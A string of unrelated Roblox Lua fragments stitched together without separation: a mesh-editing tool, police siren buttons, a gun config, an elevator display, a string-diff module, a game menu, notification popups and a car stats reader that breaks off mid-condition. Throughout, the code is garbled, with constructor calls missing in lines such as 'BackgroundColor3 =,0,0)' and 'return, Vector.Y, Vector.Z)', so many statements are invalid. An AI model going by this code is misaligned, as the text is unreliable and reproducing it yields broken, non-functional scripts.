Support.IdentifyCommonItem(XOffsetVariations); local CommonYOffset = Support.IdentifyCommonItem(YOffsetVariations); local CommonZOffset = Support.IdentifyCommonItem(ZOffsetVariations); -- Shortcuts to updating UI elements local AddButton = MeshTool.UI.AddButton; local RemoveButton = MeshTool.UI.RemoveButton; local MeshIdInput = MeshTool.UI.MeshIdOption.TextBox; local TextureIdInput = MeshTool.UI.TextureIdOption.TextBox; local VertexColorIndicator = MeshTool.UI.TintOption.Indicator; local XScaleInput = MeshTool.UI.ScaleOption.XInput.TextBox; local YScaleInput = MeshTool.UI.ScaleOption.YInput.TextBox; local ZScaleInput = MeshTool.UI.ScaleOption.ZInput.TextBox; local XOffsetInput = MeshTool.UI.OffsetOption.XInput.TextBox; local YOffsetInput = MeshTool.UI.OffsetOption.YInput.TextBox; local ZOffsetInput = MeshTool.UI.OffsetOption.ZInput.TextBox; -- Update the inputs UpdateDataInputs { [MeshIdInput] = MeshId and ParseAssetId(MeshId) or MeshId or '*'; [TextureIdInput] = TextureId and ParseAssetId(TextureId) or TextureId or '*'; [XScaleInput] = CommonXScale or '*'; [YScaleInput] = CommonYScale or '*'; [ZScaleInput] = CommonZScale or '*'; [XOffsetInput] = CommonXOffset or '*'; [YOffsetInput] = CommonYOffset or '*'; [ZOffsetInput] = CommonZOffset or '*'; }; UpdateColorIndicator(VertexColorIndicator, VertexColor); -- Update selection state local MeshTypeLabel = Support.FindTableOccurrence(MeshTypes, MeshType) if MeshTool.CurrentType ~= MeshTypeLabel then MeshTool.CurrentType = MeshTypeLabel MeshTool.OnTypeChanged:Fire(MeshTypeLabel) end AddButton.Visible = false; RemoveButton.Visible = false; MeshTool.UI.TypeOption.Visible = false; MeshIdInput.Parent.Visible = false; TextureIdInput.Parent.Visible = false; VertexColorIndicator.Parent.Visible = false; MeshTool.UI.ScaleOption.Visible = false; MeshTool.UI.OffsetOption.Visible = false; -- Update the UI to display options depending on the mesh type local DisplayedItems; if #Meshes == 0 then DisplayedItems = { AddButton }; -- Each selected part has a mesh, including a file mesh elseif #Meshes == #Selection.Parts and FileMeshInSelection then DisplayedItems = { MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, MeshIdInput.Parent, TextureIdInput.Parent, VertexColorIndicator.Parent, RemoveButton }; -- Each selected part has a mesh elseif #Meshes == #Selection.Parts and not FileMeshInSelection then DisplayedItems = { MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, RemoveButton }; -- Only some selected parts have meshes, including a file mesh elseif #Meshes ~= #Selection.Parts and FileMeshInSelection then DisplayedItems = { AddButton, MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, MeshIdInput.Parent, TextureIdInput.Parent, VertexColorIndicator.Parent, RemoveButton }; -- Only some selected parts have meshes elseif #Meshes ~= #Selection.Parts and not FileMeshInSelection then DisplayedItems = { AddButton, MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, RemoveButton }; end; -- Display the relevant UI elements DisplayLinearLayout(DisplayedItems, MeshTool.UI,, 0, 0, 20), 10); end; function HideUI() -- Hides the tool UI -- Make sure there's a UI if not MeshTool.UI then return; end; -- Hide the UI MeshTool.UI.Visible = false; -- Stop updating the UI UIUpdater:Stop(); end; function GetMeshes() -- Returns all the meshes in the selection local Meshes = {}; -- Get any meshes from any selected parts for _, Part in pairs(Selection.Parts) do table.insert(Meshes, Support.GetChildOfClass(Part, 'SpecialMesh')); end; -- Return the meshes return Meshes; end; function ParseAssetId(Input) -- Returns the intended asset ID for the given input -- Get the ID number from the input local Id = tonumber(Input) or tonumber(Input:lower():match('%?id=([0-9]+)')) or tonumber(Input:match('/([0-9]+)/')) or tonumber(Input:lower():match('rbxassetid://([0-9]+)')); -- Return the ID return Id; end; function VectorToColor(Vector) -- Returns the Color3 with the values in the given Vector3 -- Make sure that the given Vector3 is valid if not Vector then return end; -- Return the Color3 return, Vector.Y, Vector.Z); end; function ColorToVector(Color) -- Returns the Vector3 with the values in the given Color3 -- Make sure that the given Color3 is valid if not Color then return end; -- Return the Vector3 return, Color.g, Color.b); end; function UpdateDataInputs(Data) -- Updates the data in the given TextBoxes when the user isn't typing in them -- Go through the inputs and data for Input, UpdatedValue in pairs(Data) do -- Makwe sure the user isn't typing into the input if not Input:IsFocused() then -- Set the input's value Input.Text = tostring(UpdatedValue); end; end; end; function UpdateColorIndicator(Indicator, Color) -- Updates the given color indicator -- If there is a single color, just display it if Color then Indicator.BackgroundColor3 = Color; Indicator.Varies.Text = ''; -- If the colors vary, display a * on a gray background else Indicator.BackgroundColor3 =, 222/255, 222/255); Indicator.Varies.Text = '*'; end; end; function DisplayLinearLayout(Items, Container, StartPosition, Padding) -- Keep track of the total vertical extents of all items local Sum = 0; -- Go through each item for ItemIndex, Item in ipairs(Items) do -- Make the item visible Item.Visible = true; -- Position this item underneath the past items Item.Position = StartPosition + Item.Position.X.Scale, Item.Position.X.Offset, 0, Sum + Padding ); -- Update the sum of item heights Sum = Sum + Padding + Item.AbsoluteSize.Y; end; -- Resize the container to fit the new layout Container.Size =, 200, 0, 30 + Sum); end; function AddMeshes() -- Prepare the change request for the server local Changes = {}; -- Go through the selection for _, Part in pairs(Selection.Parts) do -- Make sure this part doesn't already have a mesh if not Support.GetChildOfClass(Part, 'SpecialMesh') then -- Queue a mesh to be created for this part table.insert(Changes, { Part = Part }); end; end; -- Send the change request to the server local Meshes = Core.SyncAPI:Invoke('CreateMeshes', Changes); -- Put together the history record local HistoryRecord = { Meshes = Meshes; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Select changed parts Selection.Replace(Record.Selection) -- Remove the meshes Core.SyncAPI:Invoke('Remove', Record.Meshes); end; Apply = function (Record) -- Reapplies this change -- Restore the meshes Core.SyncAPI:Invoke('UndoRemove', Record.Meshes); -- Select changed parts Selection.Replace(Record.Selection) end; }; -- Register the history record Core.History.Add(HistoryRecord); end; function RemoveMeshes() -- Get all the meshes in the selection local Meshes = GetMeshes(); -- Create the history record local HistoryRecord = { Meshes = Meshes; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Restore the meshes Core.SyncAPI:Invoke('UndoRemove', Record.Meshes); -- Select changed parts Selection.Replace(Record.Selection) end; Apply = function (Record) -- Reapplies this change -- Select changed parts Selection.Replace(Record.Selection) -- Remove the meshes Core.SyncAPI:Invoke('Remove', Record.Meshes); end; }; -- Send the removal request Core.SyncAPI:Invoke('Remove', Meshes); -- Register the history record Core.History.Add(HistoryRecord); end; local PreviewInitialState = nil function SetPreviewTint(Tint) -- Previews the given tint on the selection -- Reset tints to initial state if previewing is over if not Tint and PreviewInitialState then for Mesh, State in pairs(PreviewInitialState) do Mesh.VertexColor = State.VertexColor end -- Clear initial state PreviewInitialState = nil -- Skip rest of function return -- Ensure valid tint is given elseif not Tint then return -- Save initial state if first time previewing elseif not PreviewInitialState then PreviewInitialState = {} for _, Mesh in pairs(GetMeshes()) do PreviewInitialState[Mesh] = { VertexColor = Mesh.VertexColor } end end -- Apply preview tint for Mesh in pairs(PreviewInitialState) do Mesh.VertexColor = Tint end end function SetProperty(Property, Value) -- Make sure the given value is valid if not Value then return; end; -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, [Property] = Mesh[Property] }); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, [Property] = Value }); end; -- Register the changes RegisterChange(); end; function SetAxisScale(Axis, Scale) -- Sets the selection's scale on axis `Axis` to `Scale` -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, Scale = Mesh.Scale }); -- Put together the changed scale local Scale = Axis == 'X' and Scale or Mesh.Scale.X, Axis == 'Y' and Scale or Mesh.Scale.Y, Axis == 'Z' and Scale or Mesh.Scale.Z ); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, Scale = Scale }); end; -- Register the changes RegisterChange(); end; function SetAxisOffset(Axis, Offset) -- Sets the selection's offset on axis `Axis` to `Offset` -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, Offset = Mesh.Offset }); -- Put together the changed scale local Offset = Axis == 'X' and Offset or Mesh.Offset.X, Axis == 'Y' and Offset or Mesh.Offset.Y, Axis == 'Z' and Offset or Mesh.Offset.Z ); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, Offset = Offset }); end; -- Register the changes RegisterChange(); end; function SetMeshId(AssetId) -- Sets the meshes in the selection's mesh ID to the intended, given mesh asset -- Make sure the given asset ID is valid if not AssetId then return; end; -- Prepare the change request local Changes = { MeshId = 'rbxassetid://' .. AssetId; }; -- Attempt a mesh extraction on the given asset Core.Try(Core.SyncAPI.Invoke, Core.SyncAPI, 'ExtractMeshFromAsset', AssetId) :Then(function (ExtractionData) -- Ensure extraction succeeded assert(ExtractionData.success, 'Extraction failed'); -- Apply any mesh found local MeshId = ExtractionData.meshID; if MeshId then Changes.MeshId = 'rbxassetid://' .. MeshId; end; -- Apply any texture found local TextureId = ExtractionData.textureID; if TextureId then Changes.TextureId = 'rbxassetid://' .. TextureId; end; -- Apply any vertex color found local VertexColor = ExtractionData.tint; if VertexColor then Changes.VertexColor =, VertexColor.y, VertexColor.z); end; -- Apply any scale found local Scale = ExtractionData.scale; if Scale then Changes.Scale =, Scale.y, Scale.z); end; end); -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Create the history change requests for this mesh local Before, After = { Part = Mesh.Parent }, { Part = Mesh.Parent }; -- Gather change information to finish up the history change requests for Property, Value in pairs(Changes) do Before[Property] = Mesh[Property]; After[Property] = Value; end; -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, Before); -- Create the change request for this mesh table.insert(HistoryRecord.After, After); end; -- Register the changes RegisterChange(); end; function SetTextureId(AssetId) -- Sets the meshes in the selection's texture ID to the intended, given image asset -- Make sure the given asset ID is valid if not AssetId then return; end; -- Prepare the change request local Changes = { TextureId = 'rbxassetid://' .. AssetId; }; -- Attempt an image extraction on the given asset Core.Try(Core.SyncAPI.Invoke, Core.SyncAPI, 'ExtractImageFromDecal', AssetId) :Then(function (ExtractedImage) Changes.TextureId = 'rbxassetid://' .. ExtractedImage; end); -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Create the history change requests for this mesh local Before, After = { Part = Mesh.Parent }, { Part = Mesh.Parent }; -- Gather change information to finish up the history change requests for Property, Value in pairs(Changes) do Before[Property] = Mesh[Property]; After[Property] = Value; end; -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, Before); -- Create the change request for this mesh table.insert(HistoryRecord.After, After); end; -- Register the changes RegisterChange(); end; function TrackChange() -- Start the record HistoryRecord = { Before = {}; After = {}; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Select the changed parts Selection.Replace(Record.Selection) -- Send the change request Core.SyncAPI:Invoke('SyncMesh', Record.Before); end; Apply = function (Record) -- Applies this change -- Select the changed parts Selection.Replace(Record.Selection) -- Send the change request Core.SyncAPI:Invoke('SyncMesh', Record.After); end; }; end; function RegisterChange() -- Finishes creating the history record and registers it -- Make sure there's an in-progress history record if not HistoryRecord then return; end; -- Send the change to the server Core.SyncAPI:Invoke('SyncMesh', HistoryRecord.After); -- Register the record and clear the staging Core.History.Add(HistoryRecord); HistoryRecord = nil; end;
HUB.Sound.Off.MouseButton1Click:connect(function() carSeat.Parent.Body.Lightbar.M.Wail:Stop() carSeat.Parent.Body.Lightbar.M.Yelp:Stop() carSeat.Parent.Body.Lightbar.M.Priority:Stop() HUB.Sound.Off.BackgroundColor3 =,0,0) HUB.Sound.P.BackgroundColor3 =,0,0) HUB.Sound.W.BackgroundColor3 =,0,0) HUB.Sound.Y.BackgroundColor3 =,0,0) end) HUB.Sound.P.MouseButton1Click:connect(function() carSeat.Parent.Body.Lightbar.M.Wail:Stop() carSeat.Parent.Body.Lightbar.M.Yelp:Stop() carSeat.Parent.Body.Lightbar.M.Priority:Play() HUB.Sound.P.BackgroundColor3 =,0,0) HUB.Sound.Off.BackgroundColor3 =,0,0) HUB.Sound.W.BackgroundColor3 =,0,0) HUB.Sound.Y.BackgroundColor3 =,0,0) end) HUB.Sound.W.MouseButton1Click:connect(function() carSeat.Parent.Body.Lightbar.M.Wail:Play() carSeat.Parent.Body.Lightbar.M.Yelp:Stop() carSeat.Parent.Body.Lightbar.M.Priority:Stop() HUB.Sound.W.BackgroundColor3 =,0,0) HUB.Sound.P.BackgroundColor3 =,0,0) HUB.Sound.Off.BackgroundColor3 =,0,0) HUB.Sound.Y.BackgroundColor3 =,0,0) end) HUB.Sound.Y.MouseButton1Click:connect(function() carSeat.Parent.Body.Lightbar.M.Wail:Stop() carSeat.Parent.Body.Lightbar.M.Yelp:Play() carSeat.Parent.Body.Lightbar.M.Priority:Stop() HUB.Sound.Y.BackgroundColor3 =,0,0) HUB.Sound.P.BackgroundColor3 =,0,0) HUB.Sound.W.BackgroundColor3 =,0,0) HUB.Sound.Off.BackgroundColor3 =,0,0) end)
----- MAGIC NUMBERS ABOUT THE TOOL ----- -- How much damage a bullet does
local Damage = 8
-- new.Pname.Position =,0,0,80) -- new.Pname.Size =,0,1,0)
end new.Parent = sf--Parent to scrolling frame end wait() sf.Size =,0,0,ui.AbsoluteContentSize.Y) sf.CanvasSize =,0,0,ui.AbsoluteContentSize.Y) --Give enough room for the frames to sit in end wait(1) end
-- -- -- -- -- -- -- --DIRECTION SCROLL-- -- -- -- -- -- -- --
Elevator:WaitForChild("Direction").Changed:connect(function(val) if val == 1 then SetDisplay(1,"U1",9) wait(3) SetDisplay(1,"NIL",9) elseif val == -1 then SetDisplay(1,"D1",9) wait(3) SetDisplay(1,"NIL",9) else SetDisplay(1,"NIL",9) end end)
-- Compare two strings character-by-character. -- Optionally clean up small common substrings, also known as chaff.
function diffStringsRaw(a: string, b: string, cleanup: boolean): Array<Diff> local diffs = diffStrings(a, b) if cleanup then cleanupSemantic(diffs) -- impure function end return diffs end return { diffStringsUnified = diffStringsUnified, diffStringsRaw = diffStringsRaw, }
--// Gun Parts
local L_23_ = L_1_.Bolt local L_24_ = L_1_.Mag local L_25_ = L_1_.FirePart local L_26_ = L_4_:WaitForChild('FX') local L_27_
--You can change the values below to suit your needs
local max_mode = 8 --The maximum amount of modes forwards. Set to 0 to disable forwards motion. local min_mode = -8 --The minimum amount of modes backwards. Set to 0 to disable backwards motion. local increment_speed = 0.5 --The amount in which the speed value increments with every mode.
local door1 = script.Parent.Door1 local door2 = script.Parent.Door2 local vaf = script.Parent.Values local caf = script.Parent.Calls local sef = script.Parent.Settings
-- UI elements
local intro = script.Parent:WaitForChild("Intro") intro.Visible = true local tokensLabel = script.Parent:WaitForChild("Tokens") -- textlabel local tokens = game.Players.LocalPlayer:WaitForChild("Tokens") -- value wait(2) game.Workspace.Camera.CameraType = Enum.CameraType.Scriptable game.Workspace.Camera.CFrame =,game.Workspace.IntroTunnel.CameraFace.Position) local topStatus = script.Parent:WaitForChild("TopStatus") topStatus.Text = status.Value status:GetPropertyChangedSignal("Value"):Connect(function() topStatus.Text = status.Value end) tokensLabel.Text = tokens.Value tokens:GetPropertyChangedSignal("Value"):Connect(function() tokensLabel.Text = tokens.Value end) intro.Play.MouseButton1Click:Connect(function() if game.ReplicatedStorage.MapVoting.Value == true then script.Parent.MapVoting.Visible = true end intro.Visible = false topStatus.Visible = true game.ReplicatedStorage.MenuPlay:FireServer() game.Workspace.Camera.CameraType = Enum.CameraType.Custom end) game.ReplicatedStorage.KillFeed.OnClientEvent:Connect(function(text) script.Parent.KillFeed.Visible = true script.Parent.KillFeed.Text = text wait(2) script.Parent.KillFeed.Visible = false end) game.ReplicatedStorage.Announcement.OnClientEvent:Connect(function(text) script.Parent.Announcement.Text = text script.Parent.Announcement.Visible = true wait(5) script.Parent.Announcement.Visible = false end) intro.Store.MouseButton1Click:Connect(function() script.Parent:WaitForChild("Shop").Visible = true intro.Visible = false end) script.Parent.ShopBtn.MouseButton1Click:Connect(function() script.Parent.Shop.Visible = not script.Parent.Shop.Visible end) script.Parent:WaitForChild("Shop"):WaitForChild("Close").MouseButton1Click:Connect(function() if game.Players.LocalPlayer:FindFirstChild("InMenu") then intro.Visible = true end script.Parent:WaitForChild("Shop").Visible = false end)
--// All global vars will be wiped/replaced except script
return function(data) local playergui = service.PlayerGui local localplayer = service.Players.LocalPlayer local frame = script.Parent.Parent local close = frame.Frame.Close local main = frame.Frame.Main local title = frame.Frame.Title local timer = frame.Frame.Timer local gTable = data.gTable local clickfunc = data.OnClick local closefunc = data.OnClose local ignorefunc = data.OnIgnore local name = data.Title local text = data.Message or data.Text or "" local time = data.Time local returner = nil if clickfunc and type(clickfunc)=="string" then clickfunc = client.Core.LoadCode(clickfunc, GetEnv()) end if closefunc and type(closefunc)=="string" then closefunc = client.Core.LoadCode(closefunc, GetEnv()) end if ignorefunc and type(ignorefunc)=="string" then ignorefunc = client.Core.LoadCode(ignorefunc, GetEnv()) end --client.UI.Make("NotificationHolder") local holder = client.UI.Get("NotificationHolder",nil,true) if not holder then local hold = service.New("ScreenGui") local hTable = client.UI.Register(hold) local frame = service.New("ScrollingFrame", hold) client.UI.Prepare(hold) hTable.Name = "NotificationHolder" frame.Name = "Frame" frame.BackgroundTransparency = 1 frame.Size =, 200, 0.5, 0) frame.Position =, -210, 0.5, -10) frame.CanvasSize =, 0, 0, 0) frame.ChildAdded:Connect(function(c) if #frame:GetChildren() == 0 then frame.Visible = false else frame.Visible = true end end) frame.ChildRemoved:Connect(function(c) if #frame:GetChildren() == 0 then frame.Visible = false else frame.Visible = true end end) holder = hTable hTable:Ready() end local function moveGuis(holder,mod) local holdstuff = {} for i,v in pairs(holder:GetChildren()) do table.insert(holdstuff,1,v) end for i,v in pairs(holdstuff) do v.Position =,0,1,-75*(i+mod)) end,0,0,(#holder:GetChildren()*75)) local pos = (((#holder:GetChildren())*75) - holder.AbsoluteWindowSize.Y) if pos<0 then pos = 0 end holder.CanvasPosition =,pos) end holder = holder.Object.Frame title.Text = name frame.Name = name main.Text = text main.MouseButton1Click:Connect(function() if frame and frame.Parent then if clickfunc then returner = clickfunc() end frame:Destroy() moveGuis(holder,0) end end) close.MouseButton1Click:Connect(function() if frame and frame.Parent then if closefunc then returner = closefunc() end gTable:Destroy() moveGuis(holder,0) end end) moveGuis(holder,1) frame.Parent = holder frame:TweenPosition(,0,1,-75),'Out','Linear',0.2) spawn(function() local sound ="Sound",service.LocalContainer()) sound.SoundId = ''.."203785584"--client.NotificationSound sound.Volume = 0.2 wait(0.1) sound:Play() wait(0.5) sound:Destroy() end) if time then timer.Visible = true spawn(function() repeat timer.Text = time,timer.TextBounds.X,0,10) wait(1) time = time-1 until time<=0 or not frame or not frame.Parent if frame and frame.Parent then if ignorefunc then returner = ignorefunc() end frame:Destroy() moveGuis(holder,0) end end) end repeat wait() until returner ~= nil or not frame or not frame.Parent return returner end
--// All global vars will be wiped/replaced except script
return function(data) local gui = script.Parent.Parent--client.UI.Prepare(script.Parent.Parent) local frame = gui.Frame local frame2 = frame.Frame local msg = frame2.Message local ttl = frame2.Title local gIndex = data.gIndex local gTable = data.gTable local title = data.Title local message = data.Message local scroll = data.Scroll local tim = data.Time local gone = false if not data.Message or not data.Title then gTable:Destroy() end ttl.Text = title msg.Text = message ttl.TextTransparency = 1 msg.TextTransparency = 1 ttl.TextStrokeTransparency = 1 msg.TextStrokeTransparency = 1 frame.BackgroundTransparency = 1 local fadeSteps = 10 local blurSize = 10 local textFade = 0.1 local strokeFade = 0.5 local frameFade = frame.BackgroundTransparency local blurStep = blurSize/fadeSteps local frameStep = frameFade/fadeSteps local textStep = 0.1 local strokeStep = 0.1 local function fadeIn() gTable:Ready() for i = 1,fadeSteps do if msg.TextTransparency>textFade then msg.TextTransparency = msg.TextTransparency-textStep ttl.TextTransparency = ttl.TextTransparency-textStep end if msg.TextStrokeTransparency>strokeFade then msg.TextStrokeTransparency = msg.TextStrokeTransparency-strokeStep ttl.TextStrokeTransparency = ttl.TextStrokeTransparency-strokeStep end if frame.BackgroundTransparency>frameFade then frame.BackgroundTransparency = frame.BackgroundTransparency-frameStep --frame2.BackgroundTransparency = frame.BackgroundTransparency end service.Wait("Stepped") end end local function fadeOut() if not gone then gone = true for i = 1,fadeSteps do if msg.TextTransparency<1 then msg.TextTransparency = msg.TextTransparency+textStep ttl.TextTransparency = ttl.TextTransparency+textStep end if msg.TextStrokeTransparency<1 then msg.TextStrokeTransparency = msg.TextStrokeTransparency+strokeStep ttl.TextStrokeTransparency = ttl.TextStrokeTransparency+strokeStep end if frame.BackgroundTransparency<1 then frame.BackgroundTransparency = frame.BackgroundTransparency+frameStep frame2.BackgroundTransparency = frame.BackgroundTransparency end service.Wait("Stepped") end service.UnWrap(gui):Destroy() end end gTable.CustomDestroy = function() fadeOut() end fadeIn() if not tim then local _,time = message:gsub(" ","") time = math.clamp(time/2,4,11)+1 wait(time) else wait(tim) end if not gone then fadeOut() end end
car:WaitForChild("STATREADER") local STATREADER = car.STATREADER:WaitForChild("Frame") STATREADER:WaitForChild("C") STATREADER:WaitForChild("FD") STATREADER:WaitForChild("FI") STATREADER:WaitForChild("HP") STATREADER:WaitForChild("HPB") STATREADER:WaitForChild("IC") STATREADER:WaitForChild("N") STATREADER:WaitForChild("P2W") STATREADER:WaitForChild("PSI") STATREADER:WaitForChild("TS") STATREADER:WaitForChild("Tires") STATREADER:WaitForChild("W") STATREADER:WaitForChild("Logo1") STATREADER:WaitForChild("Logo2") local function RoundNumber(Number, Divider) Divider = Divider or 1 return (math.floor((Number/Divider)+0.5)*Divider) end if STATREADER:FindFirstChild("Logo1") and STATREADER:FindFirstChild("Logo2") then if STATREADER.Logo1.Image == "rbxassetid://1112860376" and STATREADER.Logo2.Image == "rbxassetid://1112860376" and STATREADER.Logo2.ImageTransparency == 0 then --[[STATREADER.Close.MouseButton1Click:connect(function() STATREADER.Parent:Destroy() end)]] if _Tune.CompressRatio ~= nil then STATREADER.C.Text = "Compression: ".._Tune.CompressRatio else STATREADER.C.Text = "Compression: Data Not Available" end if _Tune.Horsepower ~= nil then STATREADER.HP.Text = "N/A Power: "..RoundNumber(_Tune.Horsepower,1).."hp" else STATREADER.HP.Text = "N/A Power: Data Not Available" end if _Tune.Horsepower ~= nil and _Tune.Boost ~= nil and _Tune.CompressRatio ~= nil and _Tune.Aspiration ~= nil then if _Tune.Aspiration == "Single" then STATREADER.HPB.Text = "Boosted Power: "..RoundNumber(_Tune.Horsepower+(_Tune.Horsepower*((((1*_Tune.Boost*1)*(_Tune.CompressRatio/10))/7.5))/2),1).."hp" STATREADER.PSI.Text = "Turbo Psi: ".._Tune.Boost.."psi" STATREADER.TS.Text = "Turbo Size: ".._Tune.TurboSize.."mm" elseif _Tune.Aspiration == "Double" then STATREADER.HPB.Text = "Boosted Power: "..RoundNumber(_Tune.Horsepower+(_Tune.Horsepower*((((1*_Tune.Boost*2)*(_Tune.CompressRatio/10))/7.5))/2),1).."hp" STATREADER.PSI.Text = "Turbo Psi: ".._Tune.Boost.."psi x2" STATREADER.TS.Text = "Turbo Size: ".._Tune.TurboSize.."mm x2" elseif _Tune.Aspiration == "Natural" then STATREADER.HPB.Text = "Boosted Power: Data Not Available" STATREADER.PSI.Text = "Turbo Psi: Data Not Available" STATREADER.TS.Text = "Turbo Size: Data Not Available" end else STATREADER.HPB.Text = "Boosted Power: Data Not Available" STATREADER.PSI.Text = "Turbo Psi: Data Not Available" STATREADER.TS.Text = "Turbo Size: Data Not Available" end if _Tune.InclineComp ~= nil then STATREADER.IC.Text = "InclineComp: ".._Tune.InclineComp else STATREADER.IC.Text = "InclineComp: Data Not Available" end STATREADER.N.Text = "Name: " if _Tune.Weight ~= nil then STATREADER.W.Text = "Weight: ".._Tune.Weight.."lbs" else STATREADER.W.Text = "Weight: Data Not Available" end if _Tune.Aspiration ~= nil then STATREADER.FI.Text = "Forced Induction: ".._Tune.Aspiration else STATREADER.FI.Text = "Forced Induction: Data Not Available" end if _Tune.FDMult ~= nil then STATREADER.FD.Text = "FDMultiplier: ".._Tune.FDMult else STATREADER.FD.Text = "FDMultiplier: Data Not Available" end if _Tune.Horsepower ~= nil and _Tune.Weight ~= nil then if _Tune.Boost ~= nil and _Tune.CompressRatio ~= nil and _Tune.Aspiration ~= nil then if _Tune.Aspiration == "Single" then STATREADER.P2W.Text = "P/W Ratio: "..RoundNumber((_Tune.Horsepower+(_Tune.Horsepower*((((1*_Tune.Boost*1)*(_Tune.CompressRatio/10))/7.5))/2))/_Tune.Weight,.0001) elseif _Tune.Aspiration == "Double" then STATREADER.P2W.Text = "P/W Ratio: "..RoundNumber((_Tune.Horsepower+(_Tune.Horsepower*((((1*_Tune.Boost*2)*(_Tune.CompressRatio/10))/7.5))/2))/_Tune.Weight,.0001) elseif _Tune.Aspiration == "Natural" then STATREADER.P2W.Text = "P/W Ratio: "..RoundNumber(_Tune.Horsepower/_Tune.Weight,.0001) end else STATREADER.P2W.Text = "P/W Ratio: "..RoundNumber(_Tune.Horsepower/_Tune.Weight,.0001) end else STATREADER.P2W.Text = "P/W Ratio: Data Not Available" end if car.DriveSeat.TireStats.Fwear.Value == .2 and car.DriveSeat.TireStats.Ffriction.Value > .579 and car.DriveSeat.TireStats.Ffriction.Value < .631 and car.DriveSeat.TireStats.Fminfriction.Value == .35 and car.DriveSeat.TireStats.Ffweight.Value == 2 and car.DriveSeat.TireStats.TCS.Value == 1 and car.DriveSeat.TireStats.Lock.Value == 1/6 and car.DriveSeat.TireStats.Spin.Value == 1/1.2 and car.DriveSeat.TireStats.Rwear.Value == .2 and car.DriveSeat.TireStats.Rfriction.Value > .579 and car.DriveSeat.TireStats.Rfriction.Value < .631 and car.DriveSeat.TireStats.Rminfriction.Value == .35 and car.DriveSeat.TireStats.Rfweight.Value == 2 and car.DriveSeat.TireStats.Reg.Value == 3.6 then STATREADER.Tires.Text = "Tires: All Season" elseif car.DriveSeat.TireStats.Fwear.Value == 30 and car.DriveSeat.TireStats.Ffriction.Value > 1.179 and car.DriveSeat.TireStats.Ffriction.Value < 1.231 and car.DriveSeat.TireStats.Fminfriction.Value == .35 and car.DriveSeat.TireStats.Ffweight.Value == 1 and car.DriveSeat.TireStats.TCS.Value == 1 and car.DriveSeat.TireStats.Lock.Value == 1/6 and car.DriveSeat.TireStats.Spin.Value == 1/1.2 and car.DriveSeat.TireStats.Rwear.Value == 30 and car.DriveSeat.TireStats.Rfriction.Value > 1.179 and car.DriveSeat.TireStats.Rfriction.Value < 1.231 and car.DriveSeat.TireStats.Rminfriction.Value == .35 and car.DriveSeat.TireStats.Rfweight.Value == 1 and car.DriveSeat.TireStats.Reg.Value == 20 then STATREADER.Tires.Text = "Tires: Drag Radials" elseif car.DriveSeat.TireStats.Fwear.Value == .3 and car.DriveSeat.TireStats.Ffriction.Value > .479 and car.DriveSeat.TireStats.Ffriction.Value < .531 and car.DriveSeat.TireStats.Fminfriction.Value == .35 and car.DriveSeat.TireStats.Ffweight.Value == 10 and car.DriveSeat.TireStats.TCS.Value == 1 and car.DriveSeat.TireStats.Lock.Value == 1/6 and car.DriveSeat.TireStats.Spin.Value == 1/1.2 and car.DriveSeat.TireStats.Rwear.Value == .3 and car.DriveSeat.TireStats.Rfriction.Value > .479 and car.DriveSeat.TireStats.Rfriction.Value < .531 and car.DriveSeat.TireStats.Rminfriction.Value == .35 and car.DriveSeat.TireStats.Rfweight.Value == 10 and car.DriveSeat.TireStats.Reg.Value == 3.6 then STATREADER.Tires.Text = "Tires: All Terrain" elseif car.DriveSeat.TireStats.Fwear.Value == .5 and car.DriveSeat.TireStats.Ffriction.Value > .729 and car.DriveSeat.TireStats.Ffriction.Value < .781 and car.DriveSeat.TireStats.Fminfriction.Value == .35 and car.DriveSeat.TireStats.Ffweight.Value == .6 and car.DriveSeat.TireStats.TCS.Value == 1 and car.DriveSeat.TireStats.Lock.Value == 1/6 and car.DriveSeat.TireStats.Spin.Value == 1/1.2 and car.DriveSeat.TireStats.Rwear.Value == .5 and car.DriveSeat.TireStats.Rfriction.Value > .729 and car.DriveSeat.TireStats.Rfriction.Value < .781 and car.DriveSeat.TireStats.Rminfriction.Value == .35 and car.DriveSeat.TireStats.Rfweight.Value == .6 and car.DriveSeat.TireStats.Reg.Value == 3.6 then STATREADER.Tires.Text = "Tires: Semi Slicks" elseif car.DriveSeat.TireStats.Fwear.Value == .6 and car.DriveSeat.TireStats.Ffriction.Value > .879 and car.DriveSeat.TireStats.Ffriction.Value < .931 and car.DriveSeat.TireStats.Fminfriction.Value == .35 and car.DriveSeat.TireStats.Ffweight.Value == .6 and car.DriveSeat.TireStats.TCS.Value == 1 and car.DriveSeat.TireStats.Lock.Value == 1/6 and car.DriveSeat.TireStats.Spin.Value == 1/1.2 and car.DriveSeat.TireStats.Rwear.Value == .6 and car.DriveSeat.TireStats.Rfriction.Value > .879 and car.DriveSeat.TireStats.Rfriction.Value < .931 and car.DriveSeat.TireStats.Rminfriction.Value == .35 and car.DriveSeat.TireStats.Rfweight.Value == .6 and car.DriveSeat.TireStats.Reg.Value == 3.6 then STATREADER.Tires.Text = "Tires: Slicks" elseif car.DriveSeat.TireStats.Fwear.Value == 0 and car.DriveSeat.TireStats.Ffriction.Value == 0 and car.DriveSeat.TireStats.Fminfriction.Value == 0 